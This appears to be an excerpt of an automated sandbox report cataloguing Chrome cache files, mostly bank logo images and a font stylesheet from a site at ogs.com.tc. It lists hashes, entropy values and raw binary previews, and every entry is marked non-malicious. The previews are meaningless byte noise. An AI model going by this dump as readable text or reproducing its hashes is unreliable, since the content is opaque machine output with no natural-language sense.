Category:	dropped
Size (bytes):	30853
Entropy (8bit):	7.553405232630665
Encrypted:	false
SSDEEP:	384:nX0d/iZ2X0un/SUveaq0A9O9R6QpxPETLFZitbM/0UQv/acp1sQoh0eY/aUjCRaJ:X0d/J0u8adL9Rpx88twMV/fVjC4
MD5:	086FF182D1CE8900789C915F40274FBA
SHA1:	8B3A467A19D3B3E1B014646B4D720570A44A129B
SHA-256:	CFE6B1FDC9E2AB8BBDA89190E3305A86866196D1B60BB3B3849D47CD5C89A3C6
SHA-512:	975293F2F2FE33D4A0E2CA64CB49078C057D692B021B8912792BDF841606323A3A2296F2F862DEE7BEE7BA836E808861A0DF23E34B62B80990E300504B72897A
Malicious:	false
Reputation:	low
Preview:	.....oExif..MM..............................b...........j.(...........1.........r.2...........i....................'.......'.Adobe Photoshop 23.5 (Windows).2022:10:01 18:05:41........................................................................."............(.....................2...........5.......H.......H..........Adobe_CM......Adobe.d.................................................................................................................................................@...."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?..T.I%)$.IJI$.R.I$...I%)$.IJI$.R.I$...I%)$.IO...T.I%)...m.6../y.h.......$..........-...qc.q}.........M.$Vd..l.._3..}...q.m....4.......f^e..z.6X.....

Chrome Cache Entry: 112

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 196 x 196, 8-bit/color RGBA, interlaced
Category:	dropped
Size (bytes):	38550
Entropy (8bit):	7.976146059619022
Encrypted:	false
SSDEEP:	768:WfsaAn77REMI0/oHfogxTtPbRk/NQ5QgKeAsL9NQl/y2Z5tQzb57:WfsaA/REMIYoHf5BtNWgU+QB/5a7
MD5:	3290DEB61511EEE631E455D4D4C421CD
SHA1:	44C7B59E98A30682100ECE6C8672715F3CFDE979
SHA-256:	CB0374314E49BE2700C9F7C6C59BE3248D2658CC0F426FAED041928712B26475
SHA-512:	E92A89601EEC2916AE04AAA2C0CB82B4E141023E0A5E61BA74A67C8A38B237BF168FDEC13A324487E599D04D4E133D5D5DC9CE1EBA0052EA33924F96F9902DD5
Malicious:	false
Reputation:	low
Preview:	.PNG........IHDR.....................gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....bKGD..............IDATx...yx.......g..B..B$aMX............\.T..p........7@.....AD.T.T.}..$.d2......e.{.{z.......d....S.N...c"..........gVIW...gj..3.Fl{`R...\|=.... 0........,..&..a.U....H.._Ie..T._../$...""2.C{ Z\|..Qd.N./"..1...d.........1......L..!"..kn O..DDT.N......W.....k...=V..o.=...T^.....H.pB..E..FO..0...e(B.nD7.9..B!.0O....D.0.4...@..l..)r.cT..{.....0.(..W..}.....^D.w.G.2.(G...#...^\|..@7h...d=...\|.N..."o.^#..........IDT.PTFFF..nu.j..\|y......."..@S.X.\|...W\.c.......WJ%".$)T^PH...@....A....SYA...9r......,..B?......c2.H..h.G..0..3.)?l.....e.MMI..Y.o.V....j.....$.z.....O.FE.E.....$I.)I.)......A.\....i.!......`.....Bv}4....Ah..(.s....[.I......6.8........"W..G.g.8.......1.....w^o.4..>..._Zr....@d....(.....8.R..o.}...f .QR....x..`.I...T..KDD?......0!.8._........=....p..P.BN.do^.A..r...ce..e.(Mp.`.A...>...[..I;5..-.oL...".i)D.S

Chrome Cache Entry: 113

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	JPEG image data, Exif standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 23.5 (Windows), datetime=2022:09:28 01:56:02], progressive, precision 8, 500x200, components 3
Category:	downloaded
Size (bytes):	33055
Entropy (8bit):	7.604025581526417
Encrypted:	false
SSDEEP:	768:VMns/70MnsMerq/Sf9nTKl8sHM7JE3jtOAVe24HEd+:OnMTnsMer7VnTuHM7JajKR
MD5:	6B6D6494A2D5FE6292641588AF2FF231
SHA1:	D4D82A589A1E71A4C917B0AFC0267BAC3C672480
SHA-256:	C521F96B7435290FD70825A2D5E45A10DC3789FEFD0D98851F72330C1D6F7A11
SHA-512:	31E4C7B87A5D90EF6A419B6A56A2BDE528E1C9368C713F1FB87A16333FF77C021BF1874B5BB74939175D46454810452582081ADB0FD5A11D6BA8844F4C5714E8
Malicious:	false
Reputation:	low
URL:	https://www.ogs.com.tc/assets/images/banks/hsbc.jpg
Preview:	......Exif..MM..............................b...........j.(...........1.........r.2...........i....................'.......'.Adobe Photoshop 23.5 (Windows).2022:09:28 01:56:02........................................................................."............(.....................2...................H.......H..........Adobe_CM......Adobe.d.................................................................................................................................................@...."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?..T.I%)$.IJIgY.....].C..o-u..Q.rT..7........Y...C.=....f..7?.d.?.7........Y...K.s}]...,o.u..$8..}...o.S...N.J..T.....&....n..'...Y..p7...(..1=..I$.B.I$...I

Chrome Cache Entry: 114

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text
Category:	downloaded
Size (bytes):	21852
Entropy (8bit):	5.505805631416707
Encrypted:	false
SSDEEP:	384:bvlLvAvFv2wvJvcvkla/U2PQDjlJQT2g/EOlIx+2BiNtlXid2yxuQlmjA2zkf/lw:bvJvAvFv5vJvcvkQ/UgQDj/QTP/EOixO
MD5:	90397E2DF1551F7F31B66E2759D8A50D
SHA1:	487D0B3D7562F9E4EFBCD8548E5C6EBD77A28EF8
SHA-256:	BD4BB9BD2A39844FA841D35AD0B27B3AEB1F625CC0D7763CAF1377D7D36D6FAE
SHA-512:	A2EC4624C366901CA6AE69B55DFFEA543F0C6227DA6925E4DF2161F1181C23AF7092B704611312DD8C07EEADC0F8413F02DFB38232FEA15E7BEAE9B91FAAA8DD
Malicious:	false
Reputation:	low
URL:	https://fonts.googleapis.com/css2?family=Roboto+Slab:wght@100;200;300;400;500;600;700;800;900&display=swap
Preview:	/* cyrillic-ext /.@font-face {. font-family: 'Roboto Slab';. font-style: normal;. font-weight: 100;. font-display: swap;. src: url(https://fonts.gstatic.com/s/robotoslab/v34/BngMUXZYTXPIvIBgJJSb6ufA5qW54A.woff2) format('woff2');. unicode-range: U+0460-052F, U+1C80-1C88, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;.}./ cyrillic /.@font-face {. font-family: 'Roboto Slab';. font-style: normal;. font-weight: 100;. font-display: swap;. src: url(https://fonts.gstatic.com/s/robotoslab/v34/BngMUXZYTXPIvIBgJJSb6ufJ5qW54A.woff2) format('woff2');. unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;.}./ greek-ext /.@font-face {. font-family: 'Roboto Slab';. font-style: normal;. font-weight: 100;. font-display: swap;. src: url(https://fonts.gstatic.com/s/robotoslab/v34/BngMUXZYTXPIvIBgJJSb6ufB5qW54A.woff2) format('woff2');. unicode-range: U+1F00-1FFF;.}./ greek */.@font-face {. font-family: 'Roboto Slab';. font-style: normal;. font-weight: 100;. font-

Chrome Cache Entry: 115

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	JPEG image data, Exif standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 23.5 (Windows), datetime=2022:10:01 17:19:10], progressive, precision 8, 500x200, components 3
Category:	downloaded
Size (bytes):	46102
Entropy (8bit):	7.754632398541905
Encrypted:	false
SSDEEP:	768:AXle3/a8XlekUl9YkExyc2wnBGsNKgiaCZXqgTnfjB3gZWr5TN/M6TJ6Ud6bPC:AXleC8XlekK9cxPBGsNKJdZ9Tn93GWr/
MD5:	6CFFC318B97A4D585F3B967257F7E3B1
SHA1:	6B3B875B2D43D05C90DD5F1DF832473B1B369D42
SHA-256:	F420DA08280CB364B9DD6EF4C6404923854A0E449DEAA93F7A97044BED52B463
SHA-512:	C37D0F4267773271D747A78A26D1D00C6ABFEB2AF3C08409925432C492B91DB7827AC48EA7B11125FCE66CC248EFB858A18F11FD8F8F1204C78E53B32C837E0B
Malicious:	false
Reputation:	low
URL:	https://www.ogs.com.tc/assets/images/banks/alternatif.jpg
Preview:	......Exif..MM..............................b...........j.(...........1.........r.2...........i....................'.......'.Adobe Photoshop 23.5 (Windows).2022:10:01 17:19:10........................................................................."............(.....................2...................H.......H..........Adobe_CM......Adobe.d.................................................................................................................................................@...."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?..T.I%)$.IJI$.R.I$...I%)$.IJI$.R.I$...I%)$.IO...T.I%9.Yz..../....0.gY.........\....\.....pz..}....^n......7../}^....D...O3#......*\2..5...Ml.....o..}...

Chrome Cache Entry: 116

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 165 x 40, 8-bit colormap, interlaced
Category:	downloaded
Size (bytes):	2220
Entropy (8bit):	7.8303895814946145
Encrypted:	false
SSDEEP:	48:3YniT3/OGVBWNNr5Ko9HRoOcqAfuvQubCdcjYEvvcl8J4D8DbSEz:j2GfWNNpmq6uYcFnc+WDo
MD5:	FDAC5F9234036C2502CEE52C30F7774B
SHA1:	CD24A9F757055E2EF598BE0D164934C6A1B4E3CD
SHA-256:	473F0D637169B8B400874FFB0C487DFC5F4BC544E8BFEBE98502A6A5CEB781E7
SHA-512:	6353199AB3414FE3D72BF07359D54B3D74D9B02153F0495D38E99EC3BD5BDAB3415425C0BDA4612388409194948D9E1E137D6F7FD5E76497ACC698AD22237C6D
Malicious:	false
Reputation:	low
URL:	https://www.ogs.com.tc/assets/images/1.png
Preview:	.PNG........IHDR.......(........x....gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....PLTE.................xy.oo.ij.de...........ef.....................ML.(".SS.\|}.TT..........0,.$...........VW.JJ......)....HH.....52....QR.75.....&......%..uu.......3/.......{\|.......ff..........................rr..?=...................B@.YY....,'.~........2...........`a....+&.......:8.FF.......DD.......[[.y{....;9....]^....kl.......z{....(!.=;........................d..\....bKGD....H....tIME.......:.+.....IDATX..Xi[.I..@...D.#.W&.....D0.A ....4.gb...o..^......CwuOMQ.U]]=D..N.W9.~}h..'.D..:.<uQ.p.4.%.A.G.k...D...<.\|....fck.J@Ty.\|.f..B. .I5..(...[...47Q.....1..bUk.Z.z].......s5\|^....o..9N...+V...6,..\.0Do..Y..@n{...#.qiN3..!*(...[@r.3x..../.M....Wc....a}..Y..c....X=.....].qo.,p.....8.).M..]1......\......q.....(Ay........B8PB.%...P?B....."...#.Y.S`.\|.=..]..0Y.F..n.`......r.v...,<..&.`6j.@..B. /.K...c..=l..4.....Kr.l....z...L.}....m...N.q.&..@..^...L.E

Chrome Cache Entry: 62

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	JPEG image data, Exif standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 23.5 (Windows), datetime=2022:10:01 17:34:34], progressive, precision 8, 500x200, components 3
Category:	downloaded
Size (bytes):	24936
Entropy (8bit):	7.391242814683689
Encrypted:	false
SSDEEP:	384:2bFO/iaEbFonMCUVzxO7NrKC85mpXXlxpJfVmqXkw9x8B:CFO/mFogxOJrFXxmeks8B
MD5:	2C60AD4276905C8109BB3981C24BB068
SHA1:	FB8C7C8F07557FF9776D9A95CB50A946A3D326BB
SHA-256:	497B1CE30CDF438891FC6F8DC9250206822ACC3E0F3D81D88599C6E6DC177795
SHA-512:	115BDDD2136E119C112D94560B83F24C84A49909F2172A40C7E75FE82F8A952B7B20ABFEC924BB4126EE3499B26865760AA33291302D236BE7D0B4A30B7CE003
Malicious:	false
Reputation:	low
URL:	https://www.ogs.com.tc/assets/images/banks/odea.jpg
Preview:	.....ZExif..MM..............................b...........j.(...........1.........r.2...........i....................'.......'.Adobe Photoshop 23.5 (Windows).2022:10:01 17:34:34........................................................................."............(.....................2........... .......H.......H..........Adobe_CM......Adobe.d.................................................................................................................................................@...."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?..T.I%)$.IJI$.R.I$...I%)$.IJI$.R.I$...I%)$.IO...T.I%)$......j]..........k.B.r_m;.G.~.....z...%=.K....0:..O..e...m6_.k.h..c.m.j.k..z.U..Y.......__....

Chrome Cache Entry: 63

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	RIFF (little-endian) data, Web/P image, VP8 encoding, 500x200, Scaling: [none]x[none], YUV color, decoders should clamp
Category:	dropped
Size (bytes):	6232
Entropy (8bit):	7.9601543548667015
Encrypted:	false
SSDEEP:	96:e5cUySaDRnAHjREcke1qe0zapt0dTHv0UxWcgv3O6j+lp7LDSvwVt0Cj:McU05A9EckcREapWPgHqlpHjsC
MD5:	23F8245CA4B48852594FD42621DA538E
SHA1:	64CE65DD304712ACCA99110878FACF125CFC029B
SHA-256:	DC1AB0A4FBEF32DF24A561823E09CFD394CB1486BBCF4D5C74981FD74E039010
SHA-512:	83FE7186C65E72D10C80892FAEC68341525E376E6758261C34F31B395D89C85CA12033B2ECD6BAE583CFA9FA69EC055A8B88D594536C6B75F7CFA384AA82E568
Malicious:	false
Reputation:	low
Preview:	RIFFP...WEBPVP8 D...Pi.......>I$.E..!.L..(....p...o.{J...m...4..<.....v.2..z......I....................u...yo~../.e...k.9..YC._...\|(...9./..#{/.5...<..A...?.j.3?........_.?.?..~.r.O.........2>.{..,.......^.......G.o......3..}=.W...O.......K...............7.A.]."....$.R.9.U..y%..\|.....(T...EU.d.IB.f.T.[K...../<..R..S.<,l$"....#.:..v..&....\sch...\.%.Avlb..h^.$.+.2....7o.....g.....!.<0kp.Z]..@1NbF........<.N.u.Qk',.#..3....aq.IHP...rM&..]....\sj........<...BM....u."!xs.^.V`>.."=RMe.U..t...%4R(.....9.q.S..m.h...p..Ii..p.{TNU.1c.M.'...Z..6!...........NC]..ERh~....c.U_....q........A7.(....E...9..dM=n.7"...^z..6fb....u.t...M3...V...8..t .p.'.OM9,......:.q.Y...b.7......(3.....Y.u.Z....L~.EQxR.........y..h.6.E....<QB.J.3.O...i.,.........>_..W...`...y%..@.(....7..8#.^..7.5.U..y%..\|.....(T...EU.d.IB..8r.. .J....U_...P.........Ox.7..&.;W.g..^qcy.gU...e....D...K.1R~yn..L........Ik}....ij...Wq&=e.T+...M.>0M..3......V.....y..K..^.#......

Chrome Cache Entry: 64

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	JPEG image data, Exif standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 23.5 (Windows), datetime=2022:10:01 20:19:27], progressive, precision 8, 500x200, components 3
Category:	dropped
Size (bytes):	36270
Entropy (8bit):	7.647087471913715
Encrypted:	false
SSDEEP:	768:dDL/CDMGJ4x2yom4g9v4aWZYZDPnNrCmgZH6AtBF:di4GJfdNgNpWZYXrFgZ7
MD5:	DFF21D4248FC2A0B6B34A0D108B9121A
SHA1:	E52B06B2F5C7379AE46751B399A10E53425C02D4
SHA-256:	599A24CF29AB06D972A5C2E4386F21051D3B78B27F93B9306EB3FFCC71263B94
SHA-512:	132754CF24C1485608CB61747782B680D8C0DA34DDCDB5229DEC03CE7B647B82840B76D768BFD7BE3BD73C7A8B2B91604851C78A890AE748D13487B1133A8BEC
Malicious:	false
Reputation:	low
Preview:	......Exif..MM..............................b...........j.(...........1.........r.2...........i....................'.......'.Adobe Photoshop 23.5 (Windows).2022:10:01 20:19:27........................................................................."............(.....................2...................H.......H..........Adobe_CM......Adobe.d.................................................................................................................................................@...."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?..T.I%)$.IJI$.R.I$...I%)$.IJI$.R.@.........\bO.G.s......Vm..6C_i..8......).$..L.$v.>..W.Y.L.$b7....f.I$..I$.J....T.I%)$.IJIQ..k..;r)..m.a.fCZ...^......

Chrome Cache Entry: 65

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	RIFF (little-endian) data, Web/P image, VP8 encoding, 500x200, Scaling: [none]x[none], YUV color, decoders should clamp
Category:	downloaded
Size (bytes):	4042
Entropy (8bit):	7.944757222253673
Encrypted:	false
SSDEEP:	48:s4M0dukGQY5v9g+Ca2TWLwk75UOlI6QEpWgDDwrYhwxf8wHG8umz00og2SBtKiCL:s4MW8vKFqLqX61pm8Au2H4iCGQ
MD5:	F188C8BDEC3EF94C06AAEF6EE7381867
SHA1:	36DD9ECD9ECCE60496899DCC092508D06ADD77DD
SHA-256:	80F27648BA9BCFE1F3E29EAA9EA2B0C87C815CAFAA0D708042D0EE926E295B14
SHA-512:	9EFD2C067F15AC9A8C543D8D056655CB5EC18A79F72CF1F7320A0AB14077EB5828AEE2295CAD560BD62ED59205211D959540E9692F406278181FD8205DFA4073
Malicious:	false
Reputation:	low
URL:	https://www.ogs.com.tc/assets/images/banks/ykb.jpg
Preview:	RIFF....WEBPVP8 .....X.......>I$.E..!...H(....p.X.....r..7{o....s......Q.........o0..^..`?_.e....~......w...u..........`...=6.t...........=......N.?t{S...~.~w.......;....._.\s ..G....T2..i.'.'.m.?..r.../._.C.Q...3.-...O..j.E.K.~}.{......../p^..{......../p^..{......../p^..{......../p^.......d....8j.$..3...~.4..}....".B.....9..tdQ.<.7.F.9.v+Z^..O.9...M=.JqW..!w...]...t.N..}..h\..>MN....h.c.oA....5s......^..=3...#...x.l6..."a?..!~.'.W.{...<..c.v...r%m..cq~..c^... .......Os....nR.'..h.6..;........{.T...wC....J.i2.N.8`..J......y.v........!...u.N0(..MHF..x.7.N .Uw.<!...`!.....[0x.h..@+V"......0xg%z........A. .<.x...q........DCw..]>.9W..p^..{......../p^..{......../p^..{......../p^..{........).............B}.....?\|.....:.....r]N#AP.G....\|.^.z...F.......y.....u..lqj.M'.$..:...d.M.\|.VXv.a1..v. M.-.b...)..h1...5.I.p.....6.L..g.t..Q.f....Q!L.$......n...W.IH.........6b.B......q.a.].R.....J4.....u1P.D...F\..P...."s.%c..`........n...:........]2 \.

Chrome Cache Entry: 66

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	RIFF (little-endian) data, Web/P image, VP8 encoding, 500x200, Scaling: [none]x[none], YUV color, decoders should clamp
Category:	dropped
Size (bytes):	5268
Entropy (8bit):	7.94280823443583
Encrypted:	false
SSDEEP:	96:pd9cVC1HAbPq1GBgYmJbtt3I0yjjFvH7Oj61RdEv5fczq78cz21PQj:WVCJ12HmJp6tbS6bdExfAw24
MD5:	34CDE1A4D95782DC8A404F3B7A22707C
SHA1:	11ACDBECC2E820EA75A21EFC9D19C7F3EBB62631
SHA-256:	CF164D0F6DBDD0F6AA11BA954189B8DCF4CD07AD066083633986C176FC0019CD
SHA-512:	1194C6EE637E6530B64FB3C1C2D93FE76533F3A79648D43778EDD4CA5C0FDFB1E437A63CFA050D0E4986DE41A17F009766C409FA7A42C5BAE0A348778EB04BE6
Malicious:	false
Reputation:	low
Preview:	RIFF....WEBPVP8 ....0c.......>I$.E..!.Z..(....p...o~.g.....~..\|.<{....=......N..I.....c...3.....@....z.....u>................?..'./.o..%.v..2....?"........_{?..7.O._....~.........N.;...;..V...........'......e...[...._.=..1.....o.o._.?..........((.L.T[/;s.L.T[/;s.L.T[/;s.L.T[/;s.L.T[/;s.L.T[/;s.L.T[/;s.L.TZzLo&.X...&...AU...:...E........R.%P.M.`.._.....r..xZ..B.\|..........).[..d.........e[...R.....u......5...J......+\.?..o0&.....RD....,s^4..}.?.-.\....TZzkF....S).x.&. ..K.P..(.#Y.......-..{.r.......[. ...h........WF..........;..GJ..O.qSn..R,....b..&Q..@..=...Z.~uV'.Mp..;.#.jlE.^..,.2..Z.r.....!.............J.....p2......b./.N...n..?...B.)..d...Jb..2.!Yc56..9<d...gD..sa....3.ma.k.v.3.LR`-..q ...x&6......I...}..:...E..:...E..:...E..:...E..:...E..:...E..:...E..:...............t.....q... N..Q.v.A...:z..(.....zNS.o.!.7.......h-F.s..R~\|...7.F._....?tP..+.....62.u.]y\|.M..^.L$`2\{..!..{.....W......~..^.{\mY.,e^........;.W.p...a..*

Chrome Cache Entry: 67

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	RIFF (little-endian) data, Web/P image, VP8 encoding, 500x200, Scaling: [none]x[none], YUV color, decoders should clamp
Category:	dropped
Size (bytes):	3510
Entropy (8bit):	7.923209159875537
Encrypted:	false
SSDEEP:	96:H/Dv4WxcN41DkQKrPidlfMhpziZcGnWyQ4Z5DOp1qoptEjm2NavQ:H/bOkhKrqr0P83Z56zpp2fcQ
MD5:	43C944FA568502BAEDCCE9455D812C3C
SHA1:	D9B1CFCAD1A4AF9CE14AF46B37D91DD8551AE9BC
SHA-256:	EE9DF8FAF35A0992E4DBFFC2DF4BB02FD6691184766D2915CF2E19BC4E906FE3
SHA-512:	C2CB9BFB37849BE3DEE22092BA08DC270A8F80070A2F55345D47CC209F4A71E25D1FAC83699D3016CF4A3EB271195A0FAD147D88E41CB955787B9F312A68413E
Malicious:	false
Reputation:	low
Preview:	RIFF....WEBPVP8 .....R.......>I$.F".!.!5..P..gn.v....K.O}..wgn:t.\|.o._._.;H..~...................p....}.?Rz...?[}4.a...d.k...X~..P...._.?...............OS...z.....G._.\|......G......Z.Xq.i.`^.\|..'....M{......O..A...........?.~`>....../.....^... ?p.-@.z....U.A.....T...._..P...-~@U@.z....U.A.....T...._..P...-~"G.y.{-../?.......U.A.....S.m.I...`.Q.m..N......P5.@.1.H9..y7.~.9..9..(?W.......+o..ky.LK... z..v.).U.A..Y7.....'-..........A.B.z.r....z.6V)6,8........3...jR.j.c....CuW...5..'.p.....R.M....-~>.".............M[....Q....j..xh5."..:.+.9..[.g.!....\Q?WY.....Rv"...fK6a.......K_..P..S..s..#.5 .h.T...._..P...-~@U@.z....U.A.....T...._..P...-~@U@.z....U.A...................@L..mt....!..H-{....t._.P......}Es.m.{u......$.o.......M..H......;.p......{..H]..~X!.].nk+.O....}... ..C.....s?....F....XI.....+.y..2..-P>....2..wE.4..)75(..4....&...?...2.rI..WCw.I.1.....3.Q.t....t...F.........rWf.....Y;.~.'B4/."..(.K..........?..p:.....H.'......Ju..p..i..]..)a

Chrome Cache Entry: 68

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	RIFF (little-endian) data, Web/P image, VP8 encoding, 500x200, Scaling: [none]x[none], YUV color, decoders should clamp
Category:	downloaded
Size (bytes):	4414
Entropy (8bit):	7.945095559581274
Encrypted:	false
SSDEEP:	96:YMZwRS+gvHuw7q1stqv9hCHvMd6c6gpilgoKwxUKr2/0C:YMGRS+gvHl7WsalDiObwuQ2Z
MD5:	D1306EE481D42E8B5C9BEDC7912750BD
SHA1:	69280F12C5A71880B049D64CCA44B99AACAF6DC3
SHA-256:	C005BB0A1E17FD46685CFFF945353975BDAC012D5F487BE9C3BFFE1C08F02FB0
SHA-512:	FD1E172442E1C782444ADF096D15BA00EB79DCEB9E994B6255EB245CEC8492A85ABD0B5D18EA5339A7A7EDAE18E06CBAAE0B79D4DC9F922574759E099698D383
Malicious:	false
Reputation:	low
URL:	https://www.ogs.com.tc/assets/images/banks/vakif.jpg
Preview:	RIFF6...WEBPVP8 ....[.......>I$.F".!!"2H.P..in.wa...\}K......i;..]:........`....z.y..S.O.../\|.@....=`......~...?..........j....7d.......\.:.7........k...%...K.._........G....._..4..._.o.......?l.'...p.....~g... .o......~.~7?..C.;.3...........]._...............I.... .=R........................q.....'....3...3....._.1.....\.....:...._........p........bX<.!d.0_ sS..3..k.@....P.3p8/.....]I...v...........=_U...2..a.5...A.........B...U..{....\.hI]JD.....y..>.YKi".".:..JUV..f7.w......_E....?.Dk.......9........kz.4}.2_i...5.r<_...f.O.....+......q.Q.//...g.K+...$.f.Z..G.)....S....e.n.2...`....7..5....c....<.._.z...I?.P.T.5..."2.3..Y]..>.Y]..>.Yf"...,..i..,..i..,..i..,..i..,..i..,..i..,..i..,..i..,..i..,..i.........f.......-...'...f....G...............>k...<'.4...s.r!......>W..La.(V.....=I..0'.f...$p.]Q.....4-.._sg.+.V. .p..G(w_....%E.x.vX..O..Y.O&..%...I.R..N...e.[.......b...b1T\|...7..._.e...,..j.L.79.\|C............,..LsI...e

Chrome Cache Entry: 69

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	RIFF (little-endian) data, Web/P image, VP8 encoding, 500x200, Scaling: [none]x[none], YUV color, decoders should clamp
Category:	dropped
Size (bytes):	4050
Entropy (8bit):	7.9449549923866
Encrypted:	false
SSDEEP:	96:I6zgu0J3Vwy7fD47SdIsVr4EEAzvpUg2yUR6g9qQV2kHEVdisb:IOg5D9k/S5dlURL92Fmsb
MD5:	C9D61E6409128B3B695DA5D0F577709D
SHA1:	DF9F6B72F626A34E1A0F7C5E09198616CD055DC6
SHA-256:	4C353EB3748F302E18D210A9AB7CC1BA7E1B28A7357E038782E4E7A88088547A
SHA-512:	4587B9784B632CDC4AF5427F7E6B735957BF1EF06FDC0B40F6ED3CD45F57E047A07C168072211A835272C703EB6AD4B841A49CB311B2B7B74DEB44A1B409D07D
Malicious:	false
Reputation:	low
Preview:	RIFF....WEBPVP8 .....U.......>I$.F".!.!...P..en.v....}...~Z{U?..........<..K..._.?(...n......O...G.....<..9.....w......q.................[...;.....o.o.o....._.?.~...u..k..j?..$..\|..g0'......a...Ey......@.....}..8.+.w.....~5.B...o.....c..-.O.....0...w..h_..f/.`.\Z..`9.e......0..2..Nmv..n.\|..6.yL.7..AS.]....._ ...S.../.P.7g.0 %.........D5.sp...9...`9.........,f....7....(.G..6.q...&..."!...........H..0.u,X.Y$..U.....<dy. .ZR.E\|5..=..g......L.6....D'#.!..P.R~..B....M.x...[M.#....-B...:..7...W..@.hm>N...zW.~.@.PT3.Y........&.. ... D..p...'....{...\|.[,.n..6.%..k..D.H........<&....a.N.Z..#T....3......2sC......./".S.C.C...%AS.]....._ ...S.../.T..o)....sk...sp...9...`9.e......0..2............a..?......1.P...I=N....4...N...........J..h.....V..~.,.0...GD.i.......R.a.."..>..p2...O^S...........@.l.W..sC..O.X.Qh....I..0..b&...jS{.LA.\|/G......w.t8.....O..Y9c..C.!7....b1\|%9r.2*:..p...rxK.^V.t._0.....p.R._..............i$..K.p....2..[_..l....)..A)r.Vq

Chrome Cache Entry: 70

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	RIFF (little-endian) data, Web/P image, VP8 encoding, 500x200, Scaling: [none]x[none], YUV color, decoders should clamp
Category:	downloaded
Size (bytes):	6232
Entropy (8bit):	7.9601543548667015
Encrypted:	false
SSDEEP:	96:e5cUySaDRnAHjREcke1qe0zapt0dTHv0UxWcgv3O6j+lp7LDSvwVt0Cj:McU05A9EckcREapWPgHqlpHjsC
MD5:	23F8245CA4B48852594FD42621DA538E
SHA1:	64CE65DD304712ACCA99110878FACF125CFC029B
SHA-256:	DC1AB0A4FBEF32DF24A561823E09CFD394CB1486BBCF4D5C74981FD74E039010
SHA-512:	83FE7186C65E72D10C80892FAEC68341525E376E6758261C34F31B395D89C85CA12033B2ECD6BAE583CFA9FA69EC055A8B88D594536C6B75F7CFA384AA82E568
Malicious:	false
Reputation:	low
URL:	https://www.ogs.com.tc/assets/images/banks/finans.jpg
Preview:	RIFFP...WEBPVP8 D...Pi.......>I$.E..!.L..(....p...o.{J...m...4..<.....v.2..z......I....................u...yo~../.e...k.9..YC._...\|(...9./..#{/.5...<..A...?.j.3?........_.?.?..~.r.O.........2>.{..,.......^.......G.o......3..}=.W...O.......K...............7.A.]."....$.R.9.U..y%..\|.....(T...EU.d.IB.f.T.[K...../<..R..S.<,l$"....#.:..v..&....\sch...\.%.Avlb..h^.$.+.2....7o.....g.....!.<0kp.Z]..@1NbF........<.N.u.Qk',.#..3....aq.IHP...rM&..]....\sj........<...BM....u."!xs.^.V`>.."=RMe.U..t...%4R(.....9.q.S..m.h...p..Ii..p.{TNU.1c.M.'...Z..6!...........NC]..ERh~....c.U_....q........A7.(....E...9..dM=n.7"...^z..6fb....u.t...M3...V...8..t .p.'.OM9,......:.q.Y...b.7......(3.....Y.u.Z....L~.EQxR.........y..h.6.E....<QB.J.3.O...i.,.........>_..W...`...y%..@.(....7..8#.^..7.5.U..y%..\|.....(T...EU.d.IB..8r.. .J....U_...P.........Ox.7..&.;W.g..^qcy.gU...e....D...K.1R~yn..L........Ik}....ij...Wq&=e.T+...M.>0M..3......V.....y..K..^.#......

Chrome Cache Entry: 71

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
